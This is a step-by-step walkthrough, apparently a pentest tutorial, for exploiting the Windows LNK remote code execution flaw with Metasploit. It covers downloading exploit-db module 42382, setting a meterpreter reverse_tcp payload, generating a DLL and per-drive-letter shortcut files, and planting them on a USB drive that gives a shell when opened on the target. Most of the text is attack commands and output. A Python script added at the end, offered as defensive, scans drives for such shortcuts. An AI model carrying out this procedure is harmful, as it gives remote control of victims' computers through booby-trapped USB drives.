1. Download the exploit script
Download the LNK Remote Code Execution Vulnerability exploit file from exploit-db
wget https://www.exploit-db.com/download/42382.rb
2. Install the exploit script
Installing the exploit script is simple: just copy the downloaded Ruby exploit file into the appropriate Metasploit modules directory
cp 42382.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
3. Start the listener and generate the files
msf > search 42382
msf exploit(42382) > use exploit/windows/fileformat/42382
msf exploit(42382) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(42382) > set lhost 192.168.1.15
msf exploit(42382) > show targets
msf exploit(42382) > set target 0
msf exploit(42382) > exploit
[*] /root/.msf4/local/lLbLLlpJEWOCVjXn.dll created copy it to the root folder of the target USB drive
[*] /root/.msf4/local/attUBiQoEENCHdXj_D.lnk create, copy to the USB drive if drive letter is D
[*] /root/.msf4/local/TPIhmhvfUkHRaotP_E.lnk create, copy to the USB drive if drive letter is E
[*] /root/.msf4/local/jlhbqmicbvEDUucR_F.lnk create, copy to the USB drive if drive letter is F
[*] /root/.msf4/local/KvvqRTlZixISpRHK_G.lnk create, copy to the USB drive if drive letter is G
[*] /root/.msf4/local/FDiknQGLVXPKFBIC_H.lnk create, copy to the USB drive if drive letter is H
[*] /root/.msf4/local/gHhqXTwmxeDPlpTA_I.lnk create, copy to the USB drive if drive letter is I
[*] /root/.msf4/local/njveXscZFvRwJLFJ_J.lnk create, copy to the USB drive if drive letter is J
[*] /root/.msf4/local/nZxhpuwJHVAIUNXx_K.lnk create, copy to the USB drive if drive letter is K
[*] /root/.msf4/local/QbOVySllSZXOmglY_L.lnk create, copy to the USB drive if drive letter is L
[*] /root/.msf4/local/qQhIaawNDiMbcaqK_M.lnk create, copy to the USB drive if drive letter is M
[*] /root/.msf4/local/fSylFhAGVNNwaYnd_N.lnk create, copy to the USB drive if drive letter is N
[*] /root/.msf4/local/PQyizrKnVNCRQJkd_O.lnk create, copy to the USB drive if drive letter is O
[*] /root/.msf4/local/xfhnyJCEsOdbpnhs_P.lnk create, copy to the USB drive if drive letter is P
[*] /root/.msf4/local/oSYDiEMnouNpHFqE_Q.lnk create, copy to the USB drive if drive letter is Q
[*] /root/.msf4/local/OBlpipdrGcLVdvhd_R.lnk create, copy to the USB drive if drive letter is R
[*] /root/.msf4/local/MFxDTvxGjYarzweM_S.lnk create, copy to the USB drive if drive letter is S
[*] /root/.msf4/local/LwmuNxBWnRfWevDC_T.lnk create, copy to the USB drive if drive letter is T
[*] /root/.msf4/local/wlJlNxRBICJVLnQX_U.lnk create, copy to the USB drive if drive letter is U
[*] /root/.msf4/local/rOHsCIBWNTrXGstq_V.lnk create, copy to the USB drive if drive letter is V
[*] /root/.msf4/local/BKUZRSPKBSukmlpy_W.lnk create, copy to the USB drive if drive letter is W
[*] /root/.msf4/local/hbOvINMLAxHcWavV_X.lnk create, copy to the USB drive if drive letter is X
[*] /root/.msf4/local/FTLzXgWfeTeMuieN_Y.lnk create, copy to the USB drive if drive letter is Y
[*] /root/.msf4/local/JKYOcCLPNuxnHvlh_Z.lnk create, copy to the USB drive if drive letter is Z
After running the Metasploit commands above, a listener is started locally and multiple link files are generated in ~/.msf4/local
4. Build the pentest USB drive
Copy all of the generated Link files from the ~/.msf4/local directory to the root of the USB drive
5. Trigger the vulnerability and get a shell
Insert the USB drive into the target Windows machine; opening the drive triggers the remote link vulnerability, and a shell on the target host is obtained in the Metasploit console
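From the defender's side, an added example (not part of the original write-up) that triages the artefacts this procedure leaves on a drive: it flags any well-formed .lnk at a removable drive's root that references a .dll on that same drive, on the assumption, suggested by the per-drive-letter naming in the output above, that each generated shortcut embeds the absolute path of the dropped DLL; the sample bytes are constructed, not captured from the module.

```python
import re
from pathlib import Path

# First 20 bytes of a Shell Link: HeaderSize 0x4C followed by the ShellLink
# CLSID {00021401-0000-0000-C000-000000000046}, as defined in MS-SHLLINK.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

# A drive-letter DLL path (X:\...\name.dll) stored as ASCII or as UTF-16LE.
ASCII_DLL = re.compile(rb"([A-Za-z]):\\[^\x00]{1,128}?\.dll", re.I)
WIDE_DLL = re.compile(
    rb"([A-Za-z])\x00:\x00\\\x00(?:[^\x00]\x00){1,128}?\.\x00d\x00l\x00l\x00", re.I)


def dll_refs(data: bytes) -> list[tuple[str, str]]:
    """Return (drive letter, path) for every DLL path embedded in a LNK blob."""
    refs = [(m.group(1).decode().upper(), m.group(0).decode("ascii", "replace"))
            for m in ASCII_DLL.finditer(data)]
    refs += [(m.group(1).decode().upper(), m.group(0).decode("utf-16-le", "replace"))
             for m in WIDE_DLL.finditer(data)]
    return refs


def is_suspicious(data: bytes, drive: str) -> bool:
    """A well-formed LNK that points at a DLL on the very drive it sits on is the
    shape of the per-letter artefacts above (assumption, see lead-in); ordinary
    shortcuts target an .exe or a document, not a DLL dropped beside them."""
    if not data.startswith(LNK_MAGIC):
        return False
    return any(letter == drive.upper() for letter, _ in dll_refs(data))


def scan_drive(root: Path, drive: str) -> list[str]:
    """Check every .lnk at a removable drive root; returns names to quarantine."""
    return sorted(p.name for p in root.glob("*.lnk")
                  if is_suspicious(p.read_bytes(), drive))


# Constructed samples (not captured from the module): a shortcut referencing
# dropped.dll on drive D as a UTF-16LE string, and a benign one to notepad.exe.
BAD_LNK = LNK_MAGIC + b"\x00" * 56 + "D:\\dropped.dll".encode("utf-16-le")
GOOD_LNK = LNK_MAGIC + b"\x00" * 56 + b"C:\\Windows\\notepad.exe"

if __name__ == "__main__":
    for name, blob in (("bad.lnk", BAD_LNK), ("good.lnk", GOOD_LNK)):
        print(name, "SUSPICIOUS" if is_suspicious(blob, "D") else "ok")
```

Run it as `scan_drive(Path("/media/usb"), "D")` against a mounted drive to list the shortcuts worth quarantining; a match is a triage signal, not proof of exploitation.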